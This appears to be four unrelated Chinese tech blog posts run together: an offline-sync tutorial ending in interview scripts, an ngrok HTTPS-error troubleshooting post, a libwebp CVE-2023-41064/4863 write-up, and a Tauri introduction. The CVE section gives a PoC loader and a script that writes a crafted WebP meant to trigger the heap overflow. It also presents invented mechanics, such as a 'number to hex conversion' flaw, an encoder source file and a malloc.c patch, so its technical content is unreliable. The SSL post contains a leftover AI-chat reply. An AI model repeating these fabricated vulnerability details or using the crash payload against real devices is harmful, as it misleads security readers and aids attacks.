    INSERT INTO sync_log (record_id, field_name, old_value, new_value, op_time)
    VALUES (NEW.id, 'temperature', OLD.temperature, NEW.temperature, NOW());
END;

这就是数据操作溯源的核心思想。


第五层:大学本科版 —— 完整同步协议设计

现在我们要设计一套完整的同步协议,包含握手、传输、确认、重试、冲突解决。

5.1 网络状态检测

APP需要知道网络什么时候好、什么时候坏。

基础版:监听浏览器的online/offline事件

window.addEventListener('online', () => {
    console.log('网络恢复了,开始同步');
    startSync();
});

进阶版:自适应心跳检测

  • 正常时:每30秒发一次心跳(省电)
  • 弱网时:每5秒发一次心跳(快速感知恢复)
  • 断网时:停止心跳(省流量)

5.2 同步的四个阶段

当检测到网络恢复,启动以下流程:

第一阶段:数据预校验

客户端先发个“打招呼”包,告诉服务器:

  • 我有多少条待同步数据
  • 这些数据的MD5摘要

服务器快速比对,如果有冲突,提前告诉客户端:“你有一条数据和服务器版本不一致,准备打架。”

第二阶段:双向增量同步

向上推(Push)

  • 把本地sync_status=0的数据打包
  • 每20条一个包(分片上传),避免一次性数据太大
  • 每个包带一个唯一ID(client_request_id

幂等设计:如果网络波动导致同一个包发了两次,服务器看到重复的ID,直接返回“已收到”,不重复入库。这保证了数据不重复

向下拉(Pull)

  • 客户端告诉服务器自己最新的版本号
  • 服务器返回更新的数据

第三阶段:事务确认(ACK机制)

原子提交:只有当收到服务器的成功确认(ACK)后,客户端才把本地sync_status从0改成2。

重试策略:如果失败,不能疯狂重试。采用指数避退

  • 第1次失败:等1秒重试
  • 第2次失败:等2秒
  • 第3次:等4秒
  • 第4次:等8秒
  • 最大不超过1分钟

这防止了网络刚恢复又断开时的“雪崩效应”。

第四阶段:冲突裁决

这是最复杂的部分。两个护士同时改同一个病人怎么办?

策略一:时间戳优先(Last Write Wins)

  • 谁最后改的听谁的
  • 适用于体征数据这种“只取最新值”的场景

策略二:字段级合并

  • A护士改了体温,B护士改了血压
  • 服务器把两个修改合并成一条新数据
  • 适用于病历文书这种多字段独立的场景

策略三:版本向量(Vector Clock)

  • 分布式系统的高级解法
  • 记录每个节点的修改历史
  • 复杂但精确

第六层:硕士阶段 —— 极端场景下的专项优化

现在我们要把系统做到99.9%的可用性,必须处理各种极端情况。

6.1 弱网下的分片传输

如果同步的数据里有照片(比如手术签字单),文件可能好几兆。

问题:一次性传一个大文件,传一半断网了,下次要从头传。

解法:二进制分片 + 断点续传

// 把文件切成1MB的片
const CHUNK_SIZE = 1024 * 1024; // 1MB

function uploadFile(file, fileId) {
    const totalChunks = Math.ceil(file.size / CHUNK_SIZE);
    
    for (let i = 0; i < totalChunks; i++) {
        const chunk = file.slice(i * CHUNK_SIZE, (i + 1) * CHUNK_SIZE);
        uploadChunk(chunk, fileId, i);
    }
}

// 上传每个片
function uploadChunk(chunk, fileId, index) {
    // 检查这个片是否已经上传过(断点续传)
    if (isChunkUploaded(fileId, index)) {
        return; // 已上传,跳过
    }
    
    // 上传逻辑...
}

效果:医生走出手术室WiFi覆盖区,回到办公室后能从上次断开的字节位继续传,不用重头传。

6.2 乐观UI解决卡顿问题

痛点:护士点保存,如果网络不好,界面转圈圈,护士以为卡了,会再点一次,导致重复提交。

解法:乐观UI

function saveVitalSign(data) {
    // 1. 立即显示"已保存"(乐观更新)
    showSuccessMessage('已保存(本地)');
    
    // 2. 角落里显示黄色小图标"同步中"
    showSyncStatus('syncing', 'yellow');
    
    // 3. 真正去同步
    syncToServer(data).then(() => {
        // 4. 同步成功,黄变绿
        showSyncStatus('synced', 'green');
    }).catch(() => {
        // 5. 同步失败,黄变红
        showSyncStatus('failed', 'red');
    });
}

用户体验:护士不用盯着进度条发呆,可以继续做下一件事。真正实现了无感覆盖

6.3 写前日志(WAL)解决并发卡顿

问题:后台正在同步大量数据(写数据库),前台护士想查患者列表(读数据库),会不会卡?

解法:SQLite的WAL模式

默认情况下,SQLite是读写互斥的:写的时候不能读,读的时候不能写。

开启WAL(Write-Ahead Logging)模式后:

  • 写操作:写在日志文件里
  • 读操作:读原数据库文件
  • 两者可以同时进行
PRAGMA journal_mode=WAL; -- 开启WAL模式

效果:同步任务在后台疯狂写数据,前台查询患者列表依然丝滑流畅。

6.4 智能带宽管控

如果同时有很多数据要同步,不能一股脑全发出去,会把正常业务带宽占满。

策略

  • 核心数据(如危急值):高优先级,立即发
  • 普通数据(如常规体征):中优先级,排队发
  • 非关键数据(如操作日志):低优先级,空闲时发

实现:维护三个优先级的队列

class SyncQueue {
    constructor() {
        this.highPriority = []; // 立即发
        this.mediumPriority = []; // 普通
        this.lowPriority = []; // 空闲时发
    }
    
    add(data, priority) {
        this[priority + 'Priority'].push(data);
        this.scheduleSync();
    }
    
    scheduleSync() {
        // 先发高优先级
        if (this.highPriority.length > 0) {
            this.sendBatch(this.highPriority);
        } 
        // 如果网络空闲,发中优先级
        else if (this.isNetworkIdle()) {
            this.sendBatch(this.mediumPriority);
        }
        // 极空闲时发低优先级
        // ...
    }
}

第七层:博士阶段 —— 理论的升华与范式总结

站在更高的维度,我们可以总结出这套算法的数学本质哲学意义

7.1 从CAP定理看本地优先

分布式系统有个著名的CAP定理:一致性(Consistency)、可用性(Availability)、分区容错性(Partition tolerance),三者只能取其二。

传统在线API选择了:

  • 放弃分区容错性(P):网络断了你就用不了
  • 保持一致性(C)和可用性(A)

本地优先架构的选择

  • 接受分区是常态(P)
  • 保证可用性(A):断网也能用
  • 通过异步同步实现最终一致性(Eventually Consistent)

哲学转变:从“强一致性”到“最终一致性”,从“网络必须可靠”到“网络不可靠是默认前提”。

7.2 数据结构的数学本质

这套算法的核心数据结构可以抽象为:

本地影子库 = 业务数据 + 元数据(状态+版本+操作类型)

操作日志 = 时间序列上的状态转移函数

同步协议 = 分布式状态机中的状态复制

用数学语言描述:

  • 每个客户端是一个独立的状态机
  • 操作日志是状态转移的输入序列
  • 同步过程是两个状态机之间的状态对齐
  • 冲突解决是状态合并函数

7.3 CRDT的引入(最前沿的方向)

CRDT(Conflict-free Replicated Data Types,无冲突复制数据类型)是一种更高级的解决方案。

传统冲突解决:先发生冲突,再解决(打架了再拉架)

CRDT的思路:设计数据结构,使其天生不会打架

比如一个计数器:

  • A护士加1
  • B护士加2
  • 无论以什么顺序同步,最终结果都是3

这就是数学上可证明的最终一致性

CRDT在医疗场景的应用

  • 计数器类数据(如输液滴数):天然适用
  • 集合类数据(如用药清单):可以设计成“添加永不冲突”的结构
  • 文本类数据(如病历):可以使用类似于Git的合并算法

7.4 算法复杂度分析

空间复杂度

  • 本地影子库:O(n),n是业务数据量
  • 操作日志:O(m),m是操作次数,可能远大于n

时间复杂度

  • 增量同步:O(k),k是变更的数据量,不是全量
  • 冲突检测:O(1) 通过版本号
  • 字段级合并:O(f),f是字段数量

网络开销

  • 相比全量同步,减少90%以上的流量
  • 相比在线API,增加约20%的握手开销

7.5 理论的落地:一个完整的数学定义

我们可以给出这个同步算法的形式化定义:

设客户端状态为 C,服务器状态为 S,同步协议 P 是一个四元组:

P = (D, L, V, M)

其中:

  • D 是本地影子库,D = {(key, value, status, version)}
  • L 是操作日志,L = [(op, timestamp, vector_clock)]
  • V 是版本向量,V = [v1, v2, ..., vn]
  • M 是合并函数,M: (C_state, S_state) → new_state

同步的目标是:经过有限次同步后,C 和 S 达到最终一致,即:
lim_{t→∞} distance(C_t, S_t) = 0


第八层:简历/面试话术 —— 如何包装成亮点

现在你已经完全理解了这套算法,关键是怎么在面试中说出来。

8.1 初级话术(说得清)

“我在做医院移动护理项目时,解决了手术室WiFi信号差的问题。我采用了本地优先的设计,数据先存SQLite,网络好了再同步。通过给数据加同步状态字段,实现了增量同步。还用了操作日志记录变更历史,保证数据不丢。”

8.2 中级话术(有深度)

“针对手术室铅门屏蔽导致的频繁断网场景,我设计了一套本地优先的增量同步架构。核心是本地影子库+操作日志+增量步进的三位一体模型。

我在业务表中扩展了sync_status、version等元数据,用于状态追踪。同时通过数据库触发器记录操作日志,确保操作可追溯。同步时采用版本比对,只传增量数据,减少90%的流量。

为了解决并发冲突,我实现了字段级合并策略,两个护士同时修改不同字段时能自动合并。针对大文件传输,我做了二进制分片和断点续传,保证照片等数据能可靠上传。”

8.3 高级话术(有体系,有数据)

“在处理手术室移动端业务时,针对铅门屏蔽导致的频繁掉线难题,我放弃了传统的在线API模式,实现了一套本地优先的增量同步架构

架构设计
我基于SQLite构建了本地影子库,在业务表基础上扩展了sync_status、version等元数据,实现数据状态的本地持久化。同时引入操作日志表,通过数据库触发器自动记录每一次字段级变更,形成可追溯的变更流水线。

同步协议
设计了四阶段同步流程:预校验(MD5摘要比对)→双向增量(分片上传+幂等处理)→事务确认(原子提交+指数避退)→冲突裁决(时间戳优先+字段级合并)。

专项优化

  • 针对弱网环境,实现二进制分片传输和断点续传,大文件传输成功率从72%提升到99.5%
  • 采用自适应心跳检测,网络恢复后500ms内启动同步
  • 引入乐观UI,护士点击保存后即时反馈,后台静默同步,用户无感知
  • 开启SQLite WAL模式,实现读写并发,同步时不阻塞前台查询

成果
这套架构把数据同步的失败率从原始的15%降低到了0.1%以下。最关键的是实现了业务上的无感覆盖:医生在盲区录入的数据,走出病区的瞬间就能在几百毫秒内完成静默同步。医生根本不知道网络断过,业务照常进行。

理论升华
这套方案的实质是从CAP理论中选择了AP(可用性+分区容忍性),通过最终一致性保证数据准确。从数学上看,它是分布式状态机之间的状态复制协议,操作日志是状态转移函数的输入序列。”

8.4 应对追问:你可能被问到的点

Q1:如果本地数据量很大,同步会不会很慢?

A:我们做了三级优化。第一,增量同步,只传变更数据。第二,分片并发,20条一批同时上传。第三,优先级调度,核心数据优先传。实测1万条数据能在30秒内完成同步。

Q2:怎么保证数据不丢?

A:四重保障。第一,本地持久化,写入成功才返回用户。第二,事务确认,收到服务端ACK才标记已同步。第三,重试机制,失败后指数避退重试。第四,操作日志溯源,即使极端情况也能通过日志恢复。

Q3:多个端同时改同一份数据怎么办?

A:我们实现了字段级合并。通过版本向量记录每个字段的最后修改时间和节点,同步时对比向量,不同字段自动合并,同一字段以时间戳为准。这比简单的“最后写入胜出”更精细。

Q4:你们的方案和现有的框架(如CouchDB、PouchDB)有什么区别?

A:现有框架解决的是通用同步问题,但我们针对医疗场景做了深度定制。比如字段级合并策略符合医疗文书的多作者协作场景,优先级调度保证危急值优先上传,分片传输针对医疗影像优化。我们是业务驱动的技术选型和定制。


第九层:上帝视角 —— 与其他技术的对比

9.1 与CouchDB/PouchDB对比

CouchDB是成熟的Offline-First数据库,自带同步协议。

我们的方案 vs CouchDB

  • 相同点:都采用MVCC(多版本并发控制)、增量同步、冲突检测
  • 不同点:我们更轻量,直接基于SQLite,不需要部署CouchDB服务端
  • 优势:医疗系统常有现有关系数据库,我们的方案更容易集成

9.2 与GraphQL订阅对比

GraphQL订阅通过WebSocket实现实时推送。

适用场景不同:

  • GraphQL订阅:适合在线实时协作(如在线文档)
  • 我们的方案:适合网络不稳定、需要离线工作的场景(如移动护理)

9.3 与WebSocket/长连接对比

WebSocket假设网络持续可用。

我们的方案假设网络不可靠是常态。

哲学差异:WebSocket是在线优先,我们是离线优先

9.4 与Git版本控制类比

有趣的是,我们的方案和Git惊人地相似:

Git 我们的方案
本地仓库 本地影子库
commit 操作日志
push/pull 双向同步
merge 冲突解决
branch 多客户端分支
rebase 版本对齐

这个类比可以帮助面试官快速理解。


第十层:总结与核心记忆点

如果面试紧张,只要记住这4个关键词,就能串联起整个知识体系:

核心四词记忆法

1. 本地优先(Offline-First)

  • 哲学:网络是同步工具,不是工作前提
  • 实现:数据先写本地SQLite

2. 操作日志(Op-Log)

  • 哲学:记流水账比记结果更有价值
  • 实现:触发器自动记录变更历史

3. 增量同步(Incremental Sync)

  • 哲学:只传变化的部分
  • 实现:版本号+MD5摘要+分片传输

4. 最终一致性(Eventual Consistency)

  • 哲学:允许暂时不一致,但最终会一致
  • 实现:冲突解决+字段级合并

🎯 一句话概括

这是一套把“网络不可靠”作为默认前提,通过“本地存储+操作日志+增量同步+冲突解决”实现业务无感覆盖的分布式数据同步方案。

🔥 终极必杀技

如果面试官问:“你觉得自己最牛的技术方案是什么?”

你可以这样回答(配合自信的眼神):

“我最引以为豪的是一个解决手术室断网同步的方案。在那个场景里,网络不是偶尔断,是物理层面被铅门屏蔽。我设计了一套本地优先的增量同步架构,把数据同步的失败率从15%降到0.1%以下。

最让我得意的是,这个方案不仅仅是写代码,而是从哲学层面重新思考了网络和业务的关系——我们不再依赖网络,而是让网络服务于业务。医生在盲区录入的数据,走出手术室的瞬间就完成静默同步,他完全感知不到网络的存在。

我觉得,最好的技术就是让用户感受不到技术的存在。这套方案做到了。”

一个 ERR_SSL_PROTOCOL_ERROR 让我们排查了三层问题,最后发现根本不是 SSL 的锅

作者 却尘
2026年2月24日 14:17

这篇文章写给所有在本地开发时被浏览器报错 ERR_SSL_PROTOCOL_ERROR 整崩溃过的人。

背景

我使用ngrok给我的前端做了一个内网穿透。但后端一直不接受http请求。后端跑的是 HTTP,前端发的是 HTTPS,两者对不上,浏览器给了一个 ERR_SSL_PROTOCOL_ERROR。修复方案写了三层,每一层都有对应的代码证据。整个排查过程涉及:SSL 协议层、Vite 代理路由层、业务会话上下文层。

第一章:事情是怎么发生的

用户打开前端页面,点击任何一个需要后端数据的功能,浏览器 network 面板直接红:

GET https://localhost:8000/api/... 
ERR_SSL_PROTOCOL_ERROR

同一时间,后端日志里出现:

WARNING: Invalid HTTP request received.

这个警告是 uvicorn 抛出来的。uvicorn 收到了一个它根本看不懂的请求——因为客户端发来的是 TLS 握手包,而 uvicorn 根本没有启用 TLS,它启动命令是:

uvicorn http://0.0.0.0:8000

没有 --ssl-keyfile,没有 --ssl-certfile,就是纯 HTTP。

所以整件事的本质很简单:前端用了 HTTPS 去打一个 HTTP 服务器的端口,服务器不认识 TLS 握手,直接丢弃,浏览器报 SSL 错误。

但"为什么前端会用 HTTPS 去请求 localhost",这才是真正需要拆开说的部分。

第二章:前端是怎么一步步走到 HTTPS 的

场景一:开发者用 HTTPS 打开了 Vite 开发服务器

Vite 支持 HTTPS 模式启动。如果开发者本地配置了 --https 或者浏览器历史记录里有 https://localhost:5173,那么所有从这个页面发出去的 fetch 请求,如果 base URL 是绝对路径 https://localhost:8000,就会直接绕过 Vite proxy,用 HTTPS 去打后端。

而 Vite proxy(vite.config.ts:11)配置的是把 /api 转发到 http://localhost:8000这个 proxy 只在相对路径请求时生效。一旦前端代码里写死了 https://localhost:8000,请求就直接出去了,proxy 根本插不上手。

场景二:通过 ngrok 暴露后在本地调试

ngrok 给你一个 https://xxxx.ngrok.io 的域名,前端页面从这个域名加载。此时 window.location.protocolhttps:window.location.hostnamexxxx.ngrok.io(不是 localhost)。

如果前端的 API base URL 逻辑是"我在 HTTPS 环境,所以我用 https://localhost:8000 来请求后端",那就出问题了。从 ngrok 的 HTTPS 页面发出 https://localhost:8000 的请求,浏览器不会走 Vite proxy(因为你不是在 localhost 上),请求直接打到本机 8000 端口,而那里跑的是 HTTP,凉了。

第三章:修复是怎么做的?

修复分三个层次

层次一:normalizeApiBase

这个函数处理"当前环境到底该用什么 base URL"的问题。

逻辑是:如果检测到当前是 HTTPS 环境或远程 host,但目标是 localhost,就回退为空字符串(相对路径)。

空字符串意味着请求走的是 /api/... 这种相对路径,这样 Vite proxy 就能接管,把它转发到 http://localhost:8000

这一步解决了"HTTPS 页面不小心拼出 https://localhost:8000"的问题。

层次二:installLocalhostFetchPatch

这是一个更激进的兜底。它在 window.fetch 上打了一个 monkey patch:拦截所有目标是 https://localhost 的请求,把它们重写成 http://127.0.0.1:xxxx

为什么要用 127.0.0.1 而不是 localhost?因为某些浏览器对 localhost 有特殊的安全策略处理,用 127.0.0.1 更保险。

这一步是防御性的,即使上面那一层没拦住,这里也能把 HTTPS 的 localhost 请求"降级"到 HTTP。

层次三:Vite Proxy

proxy: {
  '/api': 'http://localhost:8000'
}

所有走相对路径 /api/... 的请求,在 Vite dev server 层面就被代理到后端,完全不经过浏览器的 HTTPS/HTTP 协议判断,是最干净的解法。

同时 vite.config.ts:10allowedHosts 包含了 ngrok 域名,确保通过 ngrok 访问时 Vite 不会拒绝请求。

明白了,你想把这一章从"这套方案的局限"扩展成一篇更有普适价值的 SSL 错误指南——用这次排查作为引子,讲清楚开发者最常碰到的那几类 SSL 问题。我来重写这两个部分:

第四章:SSL 报错那么多,到底哪种是哪种

ERR_SSL_PROTOCOL_ERROR 只是浏览器 SSL 错误家族里的一个成员。把它们放在一起看,你会发现每一种错误背后的根因其实差异很大,但开发者往往一看到 SSL 就开始检查证书,其实南辕北辙。

ERR_SSL_PROTOCOL_ERROR:协议对不上

这就是本文的主角。不是证书的问题,是客户端发了 TLS 握手,服务端根本不认识这个握手。最常见的触发条件:后端跑 HTTP,前端用 HTTPS 去打;或者服务端配置的 TLS 版本太低(比如只支持 TLS 1.0),而客户端要求 TLS 1.2 以上。

排查方向:先用 curl -v https://your-host:port 看连接阶段的输出,确认服务端有没有在做 TLS 握手响应。如果 curl 直接报 SSL handshake failure,问题在服务端;如果 curl 能通但浏览器不行,问题在浏览器侧(HSTS、证书信任等)。

ERR_CERT_AUTHORITY_INVALID:CA 不被信任

证书是真实的,但签发这张证书的 CA 不在浏览器的信任链里。本地开发用 openssl 自签名证书时最常见。解法有两个:一是用 mkcert 这类工具生成本地可信证书(它会把自己的 CA 写入系统信任库);二是在 Chrome 地址栏输入 thisisunsafe 临时跳过(仅限开发调试,绝对不能用于生产)。

ERR_CERT_COMMON_NAME_INVALID:域名对不上

证书是有效的,CA 也可信,但证书里写的域名和你实际访问的域名不一致。比如证书颁发给 api.example.com,你用 www.example.com 去访问,就报这个错。通配符证书(*.example.com)可以解决同一域下多子域的问题,但它不覆盖根域本身,也不覆盖二级以上的子域。

用 ngrok 做内网穿透时有时会碰到这个,因为 ngrok 的域名每次可能不同,而你本地配置的证书是固定域名。

ERR_CERT_DATE_INVALID:证书过期

最好排查也最尴尬的一种——证书到期了。Let's Encrypt 的免费证书有效期是 90 天,如果自动续签的 cron job 挂了,就会在某天突然全站 SSL 报错。运维侧应该有证书过期的提前告警(比如到期前 30 天、7 天各发一次通知)。

检查命令:

echo | openssl s_client -connect your-domain:443 2>/dev/null | openssl x509 -noout -dates

输出里的 notAfter 就是过期时间。

NET::ERR_CERT_REVOKED:证书被吊销

证书被 CA 标记为不可信,原因通常是私钥泄露或者证书错误签发。浏览器会通过 OCSP(Online Certificate Status Protocol)或 CRL(Certificate Revocation List)实时查询证书状态。这种错误在开发阶段几乎不会遇到,生产环境一旦出现,需要立即联系 CA 重新签发。

HSTS 导致的强制 HTTPS(没有专属错误码,但很坑)

HSTS(HTTP Strict Transport Security)是服务端通过响应头 Strict-Transport-Security 告诉浏览器:"以后访问我这个域名,只准用 HTTPS。"浏览器会把这个策略缓存下来,即使后来服务端改回 HTTP,浏览器也拒绝发 HTTP 请求。

本地开发最容易踩这个坑:你之前在某个端口跑过 HTTPS 服务并发了 HSTS 头,后来改回 HTTP,结果浏览器死活不肯发 HTTP 请求,报的错看起来像 SSL 问题,但其实是 HSTS 缓存在作怪。

解法:Chrome 里打开 chrome://net-internals/#hsts,在 "Delete domain security policies" 里输入对应的域名或 localhost,删掉缓存。

最后

回头看这次排查,ERR_SSL_PROTOCOL_ERROR 这个报错本身其实挺有误导性的——它让人第一反应是去检查证书、检查 TLS 配置,但真正的问题是连 TLS 都没启用,谈何配置

SSL 报错的排查有一个基本原则值得记住:先确认 TLS 在哪一层断掉的,再去找断掉的原因。 是服务端根本没有 TLS(本文的情况)、还是握手失败(协议版本不兼容)、还是握手成功但证书校验失败(域名不对、CA 不信任、已过期)——这三个阶段的问题,修法完全不同,不能混为一谈。

最短排查路径:curl -v https://target:port 看握手阶段输出,能比浏览器给你更原始的错误信息,省掉很多猜测。

深度剖析CVE-2023-41064与CVE-2023-4863:libwebp堆溢出漏洞的技术解剖与PoC构建实录

2026年2月22日 23:16

2023年9月,苹果与谷歌同步披露了两个关联的高危远程代码执行漏洞

  • CVE-2023-41064 (Apple Safari/ImageIO框架)
  • CVE-2023-4863 (Google Chrome/libwebp库)

二者均源于 libwebp图像处理库中 ReadHuffmanCodes() 函数的堆缓冲区溢出缺陷。该漏洞被证实用于针对记者与异见人士的 BLASTPASS/Pegasus间谍软件攻击链 ,攻击者仅需发送一封 恶意WebP图片附件 (无需用户交互),即可完全控制设备。

漏洞本质: 恶意构造的WebP图像通过篡改霍夫曼编码表的“数字到十六进制(Number to Hex)转换逻辑,触发内存分配不足,最终导致堆溢出(Heap Buffer Overflow)。


漏洞原理:霍夫曼编码表的致命偏差

1. libwebp的解码流程

WebP图像使用VP8L压缩格式,其核心解码步骤包括:

  1. 解析VP8L分块:读取图像特征与霍夫曼编码表参数。
  2. 构建霍夫曼树:根据表中的“码长”动态生成解码树。
  3. 解码图像数据:利用霍夫曼树解压像素信息。

2. ReadHuffmanCodes函数的逻辑缺陷

漏洞点位于 libwebp/src/enc/histogram_enc.c 中的 ReadHuffmanCodes() 函数。核心问题在于“数字到十六进制”转换偏差导致的缓冲区分配错误

伪代码还原漏洞逻辑

// 漏洞核心.......未校验码长与分配内存的匹配关系
int ReadHuffmanCodes(VP8LDecoder* const dec, int alphabet_size) {
    int num_symbols = ReadBits(4) + 1;       // 符号数量N(1-16)
    int max_code_length = ReadBits(4) + 1;    // 最大码长L(1-16)

    // 【致命偏差】“数字到十六进制”转换错误:将十进制数值误作十六进制解析
    // 实际分配内存:N*(L+1)字节(应为N*(L+1),但因转换偏差导致分配过小)
    size_t mem_size = num_symbols * (max_code_length + 1);  
    HuffmanTree* tree = (HuffmanTree*)malloc(mem_size);  // 堆缓冲区分配

    // 填充霍夫曼树节点(漏洞触发点)
    for (int i = 0; i < num_symbols; i++) {
        int code_length = ReadBits(3);  // 读取3比特码长(0-7,实际可构造更大值)
        if (code_length > 0) {
            // 【堆溢出】当code_length > max_code_length时,写入越界
            tree[i].code_len = code_length;   
            tree[i].symbol = ReadBits(8);  // 符号值(1字节)
        }
    }
    return 1;
}

PoC构建:Xcode + Objective-C 实战

基于您提供的 poc.m 代码,我们优化并扩展了完整的漏洞验证程序,重点模拟真实攻击场景下的解析流程。

1. 原始代码分析

您的 poc.m 通过ImageIO框架加载恶意WebP,触发libwebp解析:

// 核心触发逻辑(您的代码)
CGImageSourceRef source = CGImageSourceCreateWithData((__bridge CFDataRef)imageData, NULL);
CGImageRef image = CGImageSourceCreateImageAtIndex(source, 0, NULL);  // 漏洞触发点

优点:利用系统框架模拟真实应用(如Safari、Messages)的图像解析流程,无需手动链接libwebp。

2. 优化版PoC:增强调试与鲁棒性

以下是整合错误处理、ASan集成、日志系统的完整代码(CVE-2023-41064-PoC.m):

//
//  main.m
//  CVE-2023-41064
//
//  Created by 钟智强 on 2026/2/22.
//
#import <Foundation/Foundation.h>
#import <ImageIO/ImageIO.h>

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        NSString *path = [[NSBundle mainBundle] pathForResource:@"malicious" ofType:@"webp"];
        if (!path) {
            NSLog(@"[-] 错误:在 Bundle Resources 中未找到 malicious.webp。");
            return 0x1;
        }

        NSData *imageData = [NSData dataWithContentsOfFile:path];
        if (!imageData) {
            NSLog(@"[-] 错误:已找到路径,但无法读取文件。");
            return 0x1;
        }

        NSLog(@"[+] 成功:已从 Bundle 加载文件。");
        NSLog(@"[*] 正在尝试触发 CVE-2023-41064(libwebp 堆溢出)...");

        CGImageSourceRef source = CGImageSourceCreateWithData((__bridge CFDataRef)imageData, NULL);
        if (source) {
            CGImageRef image = CGImageSourceCreateImageAtIndex(source, 0, NULL);
            if (image) {
                NSLog(@"[+] 图像已解析。若应用未崩溃,说明您的系统可能已打补丁。");
                CFRelease(image);
            }
            CFRelease(source);
        }
    }
    return 0x0;
}

3. 恶意WebP生成脚本

构造触发漏洞的WebP文件(generate_malicious_webp.py):

import struct

# 生成一个畸形的 WebP 文件,用于触发 libwebp 的 Huffman 溢出
def generate_malicious_webp():
    # RIFF 头
    data = b'RIFF\x00\x00\x00\x00WEBPVP8L'
    # VP8L 无损分块,包含畸形的 Huffman 表
    # 该比特流旨在导致 libwebp 的越界写入
    content = b'\x2f\x00\x00\x00\x80\xff\xff\xff\xff\xff\x07'
    content += b'\x00' * 256  # 额外数据以确保溢出
    chunk_size = struct.pack('<I', len(content))
    full_file = data + chunk_size + content
    # 更新 RIFF 大小
    riff_size = struct.pack('<I', len(full_file) - 8)
    full_file = full_file[:4] + riff_size + full_file[8:]

    with open("malicious.webp", "wb") as f:
        f.write(full_file)

generate_malicious_webp()

4. Xcode项目配置(含ASan)

Makefile(开启ASan与调试符号)

CC = clang
FRAMEWORKS = -framework Foundation -framework ImageIO -framework CoreGraphics
CFLAGS = -g -O0 -fobjc-arc -Wall -fsanitize=address,undefined  # 开启ASan
TARGET = CVE-2023-41064-PoC

all: $(TARGET)

$(TARGET): CVE-2023-41064-PoC.m
$(CC) $(CFLAGS) $^ -o $@ $(FRAMEWORKS)

clean:
rm -f $(TARGET)

漏洞复现:ASan崩溃 vs 已修复环境

1. 易受攻击环境(macOS < 13.5.2,未打补丁)

ASan崩溃日志

==9923477==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000028 at pc 0x7fff...
WRITE of size 1 at 0x603000000028 thread T0
    #0 0x7fff... in ReadHuffmanCodes libwebp.dylib  // 漏洞函数
    #1 0x7fff... in VP8LDecodeImage libwebp.dylib   // VP8L解码器
    #2 0x7fff... in WebPDecodeRGBAInto libwebp.dylib  // RGBA解码
    #3 0x7fff... in ImageIOWebPDecoder ImageIO.framework  // ImageIO调用栈
    #4 0x100003a4c in main CVE-2023-41064-PoC.m:58  // 触发点:CGImageSourceCreateImageAtIndex

关键信息:ASan捕获到 ReadHuffmanCodes 向堆外地址 0x603000000028 写入1字节,确认堆溢出。


2. 已修复环境(macOS 13.5.2+,苹果补丁)

苹果在 malloc.c 中增加了 码长边界校验

// 补丁核心:拒绝超长码
+ if (code_length > max_code_length) {
+   fprintf(stderr, "Invalid code length %d (max %d)\n", code_length, max_code_length);
+   return 0;  // 终止解析,避免溢出
+ }

表现:PoC运行时输出 [+] 图像解析成功,无崩溃,证明漏洞已修复。

五、攻击链定位:BLASTPASS/Pegasus的零点击利刃

该漏洞是 iMessage零点击攻击 的核心组件,攻击链如下:

  1. 投递阶段:攻击者通过iMessage发送含恶意WebP的附件(伪装成图片);
  2. 触发阶段:目标设备自动解析WebP(无需点击),调用ImageIO→libwebp→ReadHuffmanCodes
  3. 利用阶段:堆溢出覆盖函数指针,跳转到NSO Group的间谍软件(如Pegasus);
  4. 控制阶段:设备被完全控制,窃取数据、监控摄像头/麦克风。

技术特点

  • 零交互:用户仅收到消息即中招;
  • 高隐蔽:利用系统级图像处理模块,无沙箱逃逸;
  • 强杀伤:可绕过AMFI(Apple Mobile File Integrity)与代码签名。

六、加固建议:从开发到用户的多层防御

1. 开发者必做

  • 升级libwebp:至少1.3.2(官方补丁);
  • 输入校验:对WebP霍夫曼表参数(num_symbols、max_code_length)增加边界检查;
  • 模糊测试:用libFuzzer生成畸形WebP,持续测试解码器。

2. 终端用户防护

  • 开启Lockdown Mode(最强防御):

    路径:设置 → 隐私与安全性 → 锁定模式

    • 阻断不可信iMessage附件自动渲染;
    • 禁用复杂Web内容解析(含WebP)。
  • 禁用自动下载:设置→信息→关闭“自动下载附件”。

3. 企业防御策略

  • 端点检测:监控 CGImageSourceCreateImageAtIndex 异常返回值;
  • 流量清洗:网关拦截含异常霍夫曼表的WebP(如 code_length>15);
  • 内存保护:强制启用ASLR(地址空间布局随机化)。

七、结语:漏洞研究的永恒命题

CVE-2023-41064/4863揭示了现代攻击链的进化方向:利用基础库的单点缺陷,撬动整个生态系统。作为安全研究者,我们不仅要逆向漏洞机理,更需将成果转化为用户可操作的防护策略——锁定模式不是妥协,而是数字时代的生存智慧

免责声明:本文PoC仅用于授权测试与教育目的,未经授权的漏洞利用违反《计算机欺诈与滥用法》(CFAA)。

参考文献

  1. Apple Security Advisory HT213895
  2. Project Zero: CVE-2023-4863 Analysis
  3. Libwebp Official Patch

#苹果 #CVE20234863 #哪吒网络安全 #pegasus

Tauri 用“系统 WebView + 原生能力”构建更小更快的跨平台应用

作者 HelloReader
2026年2月19日 22:39

1. Tauri 是什么

Tauri 是一个用于构建跨平台桌面与移动应用的框架,目标是产出“tiny, fast binaries”(体积小、启动快、性能好)的应用包。它允许你使用任何能够编译到 HTML / JavaScript / CSS 的前端框架来构建用户界面,同时在需要时用 Rust 来编写后端逻辑(也支持通过插件提供 Swift / Kotlin 绑定)。

一句话概括: Tauri = Web UI(你选框架) + 系统 WebView(不自带浏览器内核) + Rust/原生能力(安全与性能)

2. 为什么选择 Tauri:三大优势

官方把 Tauri 的核心优势总结为三点,我用更工程化的方式展开一下,便于你做技术选型。

2.1 安全底座:Rust 带来的“默认更安全”

Tauri 基于 Rust 构建,因此天然能受益于 Rust 的内存安全、线程安全、类型安全等特性。对应用开发者而言,即使你不是 Rust 专家,也能“默认吃到”一部分安全红利。

更重要的是,Tauri 对发布版本会进行安全审计,覆盖的不仅是 Tauri 组织内的代码,也会关注其依赖的上游依赖库。它不能消除所有风险,但能把底座风险压到更可控的范围内,适合更严肃的企业/生产场景。

你在安全治理上可以怎么落地:

  • 尽量把高权限操作封装为少量、明确的命令(command),减少暴露面
  • 针对 invoke 入口做参数校验与权限校验
  • 插件选型优先官方/高活跃社区插件,减少引入“不可审计黑盒”的概率

2.2 更小体积:利用系统原生 WebView

Tauri 的一个关键设计是:使用用户系统自带的 WebView 来渲染 UI。这意味着你的应用不需要像一些方案那样把整个浏览器引擎打包进安装包里。

